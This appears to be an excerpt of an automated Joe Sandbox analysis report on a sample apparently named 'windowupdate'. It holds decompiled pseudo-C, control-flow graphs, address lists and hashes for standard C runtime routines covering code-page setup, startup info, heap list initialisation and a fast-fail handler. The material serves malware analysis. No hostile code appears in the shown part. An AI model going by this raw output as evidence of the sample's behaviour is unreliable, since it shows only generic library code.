                      0x00d9f69a
                      0x00d9f69d
                      0x00d9f69d
                      0x00d9f720
                      0x00d9f75a
                      0x00d9f788
                      0x00d9f794
                      0x00d9f79c
                      0x00d9f7b7
                      0x00d9f7b7
                      0x00d9f7c1
                      0x00000000
                      0x00000000
                      0x00d9f7c7
                      0x00d9f7d5
                      0x00d9f7d8
                      0x00d9f814
                      0x00d9f822
                      0x00d9f822
                      0x00d9f825
                      0x00d9f864
                      0x00d9f864
                      0x00d9f86a
                      0x00d9f827
                      0x00d9f840
                      0x00d9f846
                      0x00d9f84c
                      0x00d9f852
                      0x00d9f859
                      0x00d9f859
                      0x00d9f7da
                      0x00d9f7f3
                      0x00d9f7ff
                      0x00d9f805
                      0x00d9f80c
                      0x00d9f80c
                      0x00d9f7ae
                      0x00d9f7ae
                      0x00d9f7b1
                      0x00d9f7b1
                      0x00d9f876
                      0x00d9f62b
                      0x00d9f94b
                      0x00d9f94e
                      0x00d9f958

                      APIs
                      • GetCPInfo.KERNEL32(0000FDE9,?), ref: 00D9F623
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Info
                      • String ID: $z
                      • API String ID: 1807457897-2251613814
                      • Opcode ID: c5b13576709cb128da8d15ed5e72e3de3ed71ba0271978d4fc7095b91bc9eb5f
                      • Instruction ID: bd7e713f306a8de8325b8e138b54db9b0cf253715bc546c4bbfe07b1ec553480
                      • Opcode Fuzzy Hash: c5b13576709cb128da8d15ed5e72e3de3ed71ba0271978d4fc7095b91bc9eb5f
                      • Instruction Fuzzy Hash: 99A12074E4825C9FDF25CF48C891BE9BB71EF54304F1481E9D94D9B282C274AA91CFA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D9FE00 Relevance: 3.3, APIs: 2, Instructions: 297COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 370 d9fe00-d9fe26 call d9f410 373 d9fe28-d9fe36 call d9f510 370->373 374 d9fe3b-d9fe51 370->374 380 da01f3-da0201 call d47280 373->380 378 d9ffcb-d9ffcf 374->378 379 d9fe57-d9fe64 374->379 381 d9ffe9-d9ffec 378->381 382 d9ffd1-d9ffd8 378->382 383 d9fe6a-d9fe71 379->383 384 d9ffc6 379->384 381->380 382->381 385 d9ffda-d9ffe7 IsValidCodePage 382->385 387 d9fe7c-d9fe83 383->387 384->378 385->381 388 d9fff1-d9fff8 385->388 390 d9fe91-d9fe98 387->390 391 d9fe85-d9fe8f 387->391 392 d9fffe-da001c 388->392 393 da0082-da0092 GetCPInfo 388->393 395 d9fea3-d9fea7 390->395 391->387 398 da0027-da002b 392->398 396 da0098-da009f 393->396 397 da01d7-da01de 393->397 399 d9fead-d9febe 395->399 400 d9ff54-d9ff86 call d9f350 395->400 403 da00aa-da00b1 396->403 401 da01f0 397->401 402 da01e0-da01ee call d9f510 397->402 405 da0039-da004a 398->405 406 da002d-da0037 398->406 407 d9fec9-d9feda 399->407 422 d9ff91-d9ff95 400->422 401->380 402->380 409 da00bf-da00d9 403->409 410 da00b3-da00bd 403->410 413 da0055-da0059 405->413 406->398 414 d9fedc-d9feed 407->414 415 d9ff4f 407->415 420 da00df-da00e5 409->420 421 da0196-da0199 409->421 410->403 423 da006a-da0078 call d9f5f0 413->423 424 da005b-da0068 413->424 414->415 416 d9feef-d9ff01 414->416 415->395 426 d9ff0c-d9ff1e 416->426 427 da00f0-da00f8 420->427 428 da01a0-da01a7 421->428 429 d9ffb3-d9ffc1 call d9f5f0 422->429 430 d9ff97-d9ffb1 422->430 423->380 424->413 433 d9ff4a 426->433 434 d9ff20-d9ff27 426->434 436 da00fa-da0103 427->436 437 da013f-da0146 427->437 435 da01b2-da01b6 428->435 429->380 430->422 433->407 434->433 441 d9ff29-d9ff48 434->441 443 da01b8-da01c5 435->443 444 da01c7-da01cb call d9f5f0 435->444 436->437 445 da0105-da010e 436->445 440 da0151-da0158 437->440 447 da015a-da0170 440->447 448 da0172-da0194 call d9f350 440->448 441->426 443->435 457 da01d0-da01d5 444->457 451 da0119-da0123 445->451 447->440 448->428 455 da013d 451->455 456 da0125-da013b 451->456 455->427 456->451 457->380
                      C-Code - Quality: 95%
                      			E00D9FE00(void* __ebx, void* __ecx, int __edx, void* __edi, void* __eflags, int _a4, int _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed char* _v48;
				void* __esi;
				signed int _t169;
				signed int _t172;
				signed int _t175;
				intOrPtr _t183;
				signed char* _t186;
				signed int _t190;
				signed int _t194;
				signed int _t228;
				signed int _t237;
				signed int _t251;
				signed int _t256;
				signed char* _t271;
				signed char* _t282;
				signed int _t283;
				signed int _t287;
				signed int _t291;
				signed int _t293;
				void* _t294;
				signed int _t296;
				void* _t297;
				void* _t298;

				_t294 = __edi;
				_t261 = __edx;
				_t220 = __ebx;
				_t169 =  *0xdf600c; // 0x71e60372
				_v8 = _t169 ^ _t296;
				_t172 = E00D9F410(__ebx, _t295, __eflags, _a4);
				_t298 = _t297 + 4;
				_a4 = _t172;
				if(_a4 != 0) {
					_v44 = 0;
					while(1) {
						__eflags = _v44 - 5;
						if(_v44 >= 5) {
							break;
						}
						_t172 = _v44 * 0x30;
						_t11 = _t172 + 0xdf6458; // 0x21827982
						__eflags =  *_t11 - _a4;
						if( *_t11 != _a4) {
							_t261 = _v44 + 1;
							__eflags = _t261;
							_v44 = _t261;
							continue;
						} else {
							_v32 = 0;
							while(1) {
								__eflags = _v32 - 0x101;
								if(_v32 >= 0x101) {
									break;
								}
								 *((char*)(_a8 + _v32 + 0x18)) = 0;
								_t293 = _v32 + 1;
								__eflags = _t293;
								_v32 = _t293;
							}
							_v36 = 0;
							while(1) {
								__eflags = _v36 - 4;
								if(_v36 >= 4) {
									break;
								}
								_t27 = _v36 * 8; // 0xdf646d
								_v40 = _v44 * 0x30 + _t27 + 0xdf6468;
								while(1) {
									_t282 = _v40;
									__eflags =  *_t282 & 0x000000ff;
									if(( *_t282 & 0x000000ff) == 0) {
										break;
									}
									_t283 = _v40;
									__eflags =  *(_t283 + (1 << 0)) & 0x000000ff;
									if(( *(_t283 + (1 << 0)) & 0x000000ff) != 0) {
										_v32 =  *_v40 & 0x000000ff;
										while(1) {
											_t256 = _v40;
											__eflags = _v32 - ( *(_t256 + (1 << 0)) & 0x000000ff);
											if(_v32 > ( *(_t256 + (1 << 0)) & 0x000000ff)) {
												break;
											}
											__eflags = _v32 - 0x100;
											if(_v32 < 0x100) {
												_t46 = _v36 + 0xdf6450; // 0x0
												 *(_a8 + _v32 + 0x19) =  *(_a8 + _v32 + 0x19) & 0x000000ff |  *_t46;
												_t291 = _v32 + 1;
												__eflags = _t291;
												_v32 = _t291;
												continue;
											}
											break;
										}
										_t287 = _v40 + 2;
										__eflags = _t287;
										_v40 = _t287;
										continue;
									}
									break;
								}
								_t251 = _v36 + 1;
								__eflags = _t251;
								_v36 = _t251;
							}
							 *(_a8 + 4) = _a4;
							 *((intOrPtr*)(_a8 + 8)) = 1;
							_t261 = _a8;
							 *((intOrPtr*)(_a8 + 0x21c)) = E00D9F350(_a8,  *(_a8 + 4));
							_v36 = 0;
							while(1) {
								__eflags = _v36 - 6;
								if(_v36 >= 6) {
									break;
								}
								_t71 = _v36 * 2; // 0x0
								 *((short*)(_a8 + 0xc + _v36 * 2)) =  *((intOrPtr*)(_v44 * 0x30 + _t71 + 0xdf645c));
								_t261 = _v36 + 1;
								__eflags = _t261;
								_v36 = _t261;
							}
							E00D9F5F0(_t294, _a8);
							_t173 = 0;
						}
						goto L73;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						L33:
						_t173 = _t172 | 0xffffffff;
					} else {
						__eflags = _a4 - 0xfde8;
						if(_a4 == 0xfde8) {
							goto L33;
						} else {
							_t261 = _a4 & 0x0000ffff;
							_t172 = IsValidCodePage(_a4 & 0x0000ffff);
							__eflags = _t172;
							if(_t172 != 0) {
								__eflags = _a4 - 0xfde9;
								if(_a4 != 0xfde9) {
									_t261 = _a4;
									_t175 = GetCPInfo(_a4,  &_v28);
									__eflags = _t175;
									if(_t175 == 0) {
										__eflags =  *0xf2152c;
										if( *0xf2152c == 0) {
											_t173 = _t175 | 0xffffffff;
											__eflags = _t175 | 0xffffffff;
										} else {
											E00D9F510( &_v28, _a8);
											_t173 = 0;
										}
									} else {
										_v32 = 0;
										while(1) {
											__eflags = _v32 - 0x101;
											if(_v32 >= 0x101) {
												break;
											}
											 *((char*)(_a8 + _v32 + 0x18)) = 0;
											_t194 = _v32 + 1;
											__eflags = _t194;
											_v32 = _t194;
										}
										 *(_a8 + 4) = _a4;
										 *((intOrPtr*)(_a8 + 0x21c)) = 0;
										__eflags = _v28 - 2;
										if(_v28 != 2) {
											 *((intOrPtr*)(_a8 + 8)) = 0;
										} else {
											_v48 =  &_v22;
											while(1) {
												_t229 = _v48;
												__eflags =  *_v48 & 0x000000ff;
												if(( *_v48 & 0x000000ff) == 0) {
													break;
												}
												_t186 = _v48;
												_t229 =  *(_t186 + 1) & 0x000000ff;
												__eflags =  *(_t186 + 1) & 0x000000ff;
												if(( *(_t186 + 1) & 0x000000ff) != 0) {
													_v32 =  *_v48 & 0x000000ff;
													while(1) {
														_t271 = _v48;
														__eflags = _v32 - ( *(_t271 + 1) & 0x000000ff);
														if(_v32 > ( *(_t271 + 1) & 0x000000ff)) {
															break;
														}
														 *(_a8 + _v32 + 0x19) =  *(_a8 + _v32 + 0x19) & 0x000000ff | 0x00000004;
														_t237 = _v32 + 1;
														__eflags = _t237;
														_v32 = _t237;
													}
													_t190 =  &(_v48[2]);
													__eflags = _t190;
													_v48 = _t190;
													continue;
												}
												break;
											}
											_v32 = 1;
											while(1) {
												__eflags = _v32 - 0xff;
												if(_v32 >= 0xff) {
													break;
												}
												 *(_a8 + _v32 + 0x19) =  *(_a8 + _v32 + 0x19) & 0x000000ff | 0x00000008;
												_t229 = _v32 + 1;
												__eflags = _t229;
												_v32 = _t229;
											}
											_t183 = E00D9F350(_t229,  *(_a8 + 4));
											_t298 = _t298 + 4;
											 *((intOrPtr*)(_a8 + 0x21c)) = _t183;
											 *((intOrPtr*)(_a8 + 8)) = 1;
										}
										_v36 = 0;
										while(1) {
											__eflags = _v36 - 6;
											if(_v36 >= 6) {
												break;
											}
											 *((short*)(_a8 + 0xc + _v36 * 2)) = 0;
											_t228 = _v36 + 1;
											__eflags = _t228;
											_v36 = _t228;
										}
										_t261 = _a8;
										E00D9F5F0(_t294, _a8); // executed
										_t173 = 0;
									}
								} else {
									 *(_a8 + 4) = 0xfde9;
									 *((intOrPtr*)(_a8 + 0x21c)) = 0;
									_v32 = 0;
									while(1) {
										__eflags = _v32 - 6;
										if(_v32 >= 6) {
											break;
										}
										 *((char*)(_a8 + _v32 + 0x18)) = 0;
										_t261 = _v32 + 1;
										__eflags = _t261;
										_v32 = _t261;
									}
									 *((intOrPtr*)(_a8 + 8)) = 0;
									_v36 = 0;
									while(1) {
										__eflags = _v36 - 6;
										if(_v36 >= 6) {
											break;
										}
										 *((short*)(_a8 + 0xc + _v36 * 2)) = 0;
										_t261 = _v36 + 1;
										__eflags = _t261;
										_v36 = _t261;
									}
									E00D9F5F0(_t294, _a8);
									_t173 = 0;
								}
							} else {
								goto L33;
							}
						}
					}
				} else {
					E00D9F510(_a8, _a8);
					_t173 = 0;
				}
				L73:
				return E00D47280(_t173, _t220, _v8 ^ _t296, _t261, _t294, _t295);
			}

































                      0x00d9fe00
                      0x00d9fe00
                      0x00d9fe00
                      0x00d9fe08
                      0x00d9fe0f
                      0x00d9fe17
                      0x00d9fe1c
                      0x00d9fe1f
                      0x00d9fe26
                      0x00d9fe3b
                      0x00d9fe4d
                      0x00d9fe4d
                      0x00d9fe51
                      0x00000000
                      0x00000000
                      0x00d9fe57
                      0x00d9fe5b
                      0x00d9fe61
                      0x00d9fe64
                      0x00d9fe47
                      0x00d9fe47
                      0x00d9fe4a
                      0x00000000
                      0x00d9fe6a
                      0x00d9fe6a
                      0x00d9fe7c
                      0x00d9fe7c
                      0x00d9fe83
                      0x00000000
                      0x00000000
                      0x00d9fe8b
                      0x00d9fe76
                      0x00d9fe76
                      0x00d9fe79
                      0x00d9fe79
                      0x00d9fe91
                      0x00d9fea3
                      0x00d9fea3
                      0x00d9fea7
                      0x00000000
                      0x00000000
                      0x00d9feb4
                      0x00d9febb
                      0x00d9fec9
                      0x00d9fed1
                      0x00d9fed8
                      0x00d9feda
                      0x00000000
                      0x00000000
                      0x00d9fee4
                      0x00d9feeb
                      0x00d9feed
                      0x00d9fefe
                      0x00d9ff0c
                      0x00d9ff14
                      0x00d9ff1b
                      0x00d9ff1e
                      0x00000000
                      0x00000000
                      0x00d9ff20
                      0x00d9ff27
                      0x00d9ff2c
                      0x00d9ff45
                      0x00d9ff06
                      0x00d9ff06
                      0x00d9ff09
                      0x00000000
                      0x00d9ff09
                      0x00000000
                      0x00d9ff27
                      0x00d9fec3
                      0x00d9fec3
                      0x00d9fec6
                      0x00000000
                      0x00d9fec6
                      0x00000000
                      0x00d9feed
                      0x00d9fe9d
                      0x00d9fe9d
                      0x00d9fea0
                      0x00d9fea0
                      0x00d9ff5a
                      0x00d9ff60
                      0x00d9ff67
                      0x00d9ff79
                      0x00d9ff7f
                      0x00d9ff91
                      0x00d9ff91
                      0x00d9ff95
                      0x00000000
                      0x00000000
                      0x00d9ffa4
                      0x00d9ffac
                      0x00d9ff8b
                      0x00d9ff8b
                      0x00d9ff8e
                      0x00d9ff8e
                      0x00d9ffb7
                      0x00d9ffbf
                      0x00d9ffbf
                      0x00000000
                      0x00d9fe64
                      0x00d9ffcb
                      0x00d9ffcf
                      0x00d9ffe9
                      0x00d9ffe9
                      0x00d9ffd1
                      0x00d9ffd1
                      0x00d9ffd8
                      0x00000000
                      0x00d9ffda
                      0x00d9ffda
                      0x00d9ffdf
                      0x00d9ffe5
                      0x00d9ffe7
                      0x00d9fff1
                      0x00d9fff8
                      0x00da0086
                      0x00da008a
                      0x00da0090
                      0x00da0092
                      0x00da01d7
                      0x00da01de
                      0x00da01f0
                      0x00da01f0
                      0x00da01e0
                      0x00da01e4
                      0x00da01ec
                      0x00da01ec
                      0x00da0098
                      0x00da0098
                      0x00da00aa
                      0x00da00aa
                      0x00da00b1
                      0x00000000
                      0x00000000
                      0x00da00b9
                      0x00da00a4
                      0x00da00a4
                      0x00da00a7
                      0x00da00a7
                      0x00da00c5
                      0x00da00cb
                      0x00da00d5
                      0x00da00d9
                      0x00da0199
                      0x00da00df
                      0x00da00e2
                      0x00da00f0
                      0x00da00f0
                      0x00da00f6
                      0x00da00f8
                      0x00000000
                      0x00000000
                      0x00da00fa
                      0x00da00fd
                      0x00da0101
                      0x00da0103
                      0x00da010b
                      0x00da0119
                      0x00da0119
                      0x00da0120
                      0x00da0123
                      0x00000000
                      0x00000000
                      0x00da0138
                      0x00da0113
                      0x00da0113
                      0x00da0116
                      0x00da0116
                      0x00da00ea
                      0x00da00ea
                      0x00da00ed
                      0x00000000
                      0x00da00ed
                      0x00000000
                      0x00da0103
                      0x00da013f
                      0x00da0151
                      0x00da0151
                      0x00da0158
                      0x00000000
                      0x00000000
                      0x00da016d
                      0x00da014b
                      0x00da014b
                      0x00da014e
                      0x00da014e
                      0x00da0179
                      0x00da017e
                      0x00da0184
                      0x00da018d
                      0x00da018d
                      0x00da01a0
                      0x00da01b2
                      0x00da01b2
                      0x00da01b6
                      0x00000000
                      0x00000000
                      0x00da01c0
                      0x00da01ac
                      0x00da01ac
                      0x00da01af
                      0x00da01af
                      0x00da01c7
                      0x00da01cb
                      0x00da01d3
                      0x00da01d3
                      0x00d9fffe
                      0x00da0001
                      0x00da000b
                      0x00da0015
                      0x00da0027
                      0x00da0027
                      0x00da002b
                      0x00000000
                      0x00000000
                      0x00da0033
                      0x00da0021
                      0x00da0021
                      0x00da0024
                      0x00da0024
                      0x00da003c
                      0x00da0043
                      0x00da0055
                      0x00da0055
                      0x00da0059
                      0x00000000
                      0x00000000
                      0x00da0063
                      0x00da004f
                      0x00da004f
                      0x00da0052
                      0x00da0052
                      0x00da006e
                      0x00da0076
                      0x00da0076
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d9ffe7
                      0x00d9ffd8
                      0x00d9fe28
                      0x00d9fe2c
                      0x00d9fe34
                      0x00d9fe34
                      0x00da01f4
                      0x00da0201

                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bb9a7dbeea5aa84dd153f1e5ae82c2faff00ad6bf30143ad46fd03cc6a27f93b
                      • Instruction ID: 8be03ccbe1c2703a526b238b74d840790205ffa246e6ab5d4cb8b97fe0fbe455
                      • Opcode Fuzzy Hash: bb9a7dbeea5aa84dd153f1e5ae82c2faff00ad6bf30143ad46fd03cc6a27f93b
                      • Instruction Fuzzy Hash: 77D12774904209DBDF04CF94C494AEEBBB1FF49314F24C16AE856AB242D339EA45DFA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D48740 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 461 d48740-d48768 call d48b80 call d8d790 call dbf790 467 d4876d-d48770 461->467
                      C-Code - Quality: 100%
                      			E00D48740() {
				signed int _v8;
				intOrPtr _v12;
				void* _t8;
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t14;

				_v8 = E00D48B80() & 0x0000ffff;
				_v12 = E00D8D790();
				_t8 = E00DBF790(_t9, _t12, _t13, _t14, 0xd30000, 0, _v12, _v8); // executed
				return _t8;
			}










                      0x00d4874e
                      0x00d48756
                      0x00d48768
                      0x00d48770

                      APIs
                      • ___scrt_get_show_window_mode.LIBCMTD ref: 00D48746
                        • Part of subcall function 00D48B80: GetStartupInfoW.KERNEL32(?), ref: 00D48B9A
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: InfoStartup___scrt_get_show_window_mode
                      • String ID:
                      • API String ID: 2456344720-0
                      • Opcode ID: 6f4411ee381458242b3026e17ca601a37bad00a078043657ebcd81e73d239ef5
                      • Instruction ID: c9240fe085fc0afd9abc883629322545f798d06d7ac8fe09da5f4cd933e79bc8
                      • Opcode Fuzzy Hash: 6f4411ee381458242b3026e17ca601a37bad00a078043657ebcd81e73d239ef5
                      • Instruction Fuzzy Hash: 36D017B9904208BBCB00FBE89D02BAEBBB9DB84711F108199B54897281D9305A0057F1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 00D46AF9 Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 41%
                      			E00D46AF9() {
				int _t1;
				intOrPtr _t2;
				void* _t4;
				intOrPtr _t9;
				void* _t13;
				intOrPtr* _t16;

				_t1 = IsProcessorFeaturePresent(0xc);
				if(_t1 != 0) {
					_t16 =  *[fs:0x30] + 0x34;
					_t2 =  *_t16;
					if(_t2 != 0) {
						L7:
						 *0xf20208 = _t2;
						_t4 = 1;
					} else {
						_t4 = HeapAlloc(GetProcessHeap(), 8, 8);
						_t13 = _t4;
						if(_t13 != 0) {
							__imp__InitializeSListHead(_t13);
							asm("lock cmpxchg [esi], ecx");
							if(0 != 0) {
								HeapFree(GetProcessHeap(), 0, _t13);
							}
							_t2 =  *_t16;
							goto L7;
						}
					}
					return _t4;
				} else {
					_t9 = _t1 + 1;
					 *0xf20208 = _t9;
					return _t9;
				}
			}









                      0x00d46afb
                      0x00d46b03
                      0x00d46b14
                      0x00d46b18
                      0x00d46b1c
                      0x00d46b5a
                      0x00d46b5a
                      0x00d46b61
                      0x00d46b1e
                      0x00d46b29
                      0x00d46b2f
                      0x00d46b33
                      0x00d46b36
                      0x00d46b40
                      0x00d46b46
                      0x00d46b52
                      0x00d46b52
                      0x00d46b58
                      0x00000000
                      0x00d46b58
                      0x00d46b33
                      0x00d46b64
                      0x00d46b05
                      0x00d46b05
                      0x00d46b06
                      0x00d46b0b
                      0x00d46b0b

                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000C,00D469F5,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46AFB
                      • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46B22
                      • HeapAlloc.KERNEL32(00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46B29
                      • InitializeSListHead.KERNEL32(00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46B36
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46B4B
                      • HeapFree.KERNEL32(00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46B52
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                      • String ID:
                      • API String ID: 1475849761-0
                      • Opcode ID: af3b593e2caeeee3f96144fa94f478e021c0277965f9f399e71628363eb0f11b
                      • Instruction ID: 761a21908319eb310c71a283e9ea4aa9e51c5aebb04af1849797a3223a17cf95
                      • Opcode Fuzzy Hash: af3b593e2caeeee3f96144fa94f478e021c0277965f9f399e71628363eb0f11b
                      • Instruction Fuzzy Hash: 20F04F726407039BD7619F79AC0CF1677A9FFA5B16F184429FA82D3350EB30C8019A71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D48A40 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E00D48A40(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				void* _v5;
				signed char _v6;
				long _v12;
				struct _EXCEPTION_POINTERS _v20;
				intOrPtr _v88;
				char _v96;
				char _v100;
				intOrPtr _v616;
				char* _v620;
				void* _v624;
				intOrPtr _v628;
				char _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				char _v816;
				long _t51;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t59;
				intOrPtr _t64;
				intOrPtr _t65;

				_t65 = __esi;
				_t64 = __edi;
				_t59 = __edx;
				_t53 = __ebx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t54 = _a4;
					asm("int 0x29");
				}
				_push(3);
				E00D48D10(_t41);
				_v640 = E00D4AF80(_t64,  &_v816, 0, 0x2cc);
				_v644 = _t54;
				_v648 = _t59;
				_v652 = _t53;
				_v656 = _t65;
				_v660 = _t64;
				_v616 = ss;
				_v628 = cs;
				_v664 = ds;
				_v668 = es;
				_v672 = fs;
				_v676 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v816 = 0x10001;
				_v632 = _v0;
				_v620 =  &_v0;
				_v636 =  *((intOrPtr*)( &_v0 - 4));
				E00D4AF80(_t64,  &_v100, 0, 0x50);
				_v100 = 0x40000015;
				_v96 = 1;
				_v88 = _v0;
				if(IsDebuggerPresent() != 1) {
					_v5 = 0;
				} else {
					_v5 = 1;
				}
				_v6 = _v5;
				_v20.ExceptionRecord =  &_v100;
				_v20.ContextRecord =  &_v816;
				SetUnhandledExceptionFilter(0);
				_t51 = UnhandledExceptionFilter( &_v20);
				_v12 = _t51;
				if(_v12 == 0 && (_v6 & 0x000000ff) == 0) {
					_push(3);
					return E00D48D10(_t51);
				}
				return _t51;
			}


































                      0x00d48a40
                      0x00d48a40
                      0x00d48a40
                      0x00d48a40
                      0x00d48a53
                      0x00d48a55
                      0x00d48a58
                      0x00d48a58
                      0x00d48a5a
                      0x00d48a5c
                      0x00d48a7a
                      0x00d48a80
                      0x00d48a86
                      0x00d48a8c
                      0x00d48a92
                      0x00d48a98
                      0x00d48a9e
                      0x00d48aa5
                      0x00d48aac
                      0x00d48ab3
                      0x00d48aba
                      0x00d48ac1
                      0x00d48ac8
                      0x00d48ac9
                      0x00d48acf
                      0x00d48adc
                      0x00d48ae5
                      0x00d48af1
                      0x00d48aff
                      0x00d48b07
                      0x00d48b0e
                      0x00d48b18
                      0x00d48b24
                      0x00d48b2c
                      0x00d48b26
                      0x00d48b26
                      0x00d48b26
                      0x00d48b33
                      0x00d48b39
                      0x00d48b42
                      0x00d48b47
                      0x00d48b51
                      0x00d48b57
                      0x00d48b5e
                      0x00d48b68
                      0x00000000
                      0x00d48b6f
                      0x00d48b75

                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D48A4B
                      • IsDebuggerPresent.KERNEL32 ref: 00D48B1B
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D48B47
                      • UnhandledExceptionFilter.KERNEL32(00000007), ref: 00D48B51
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
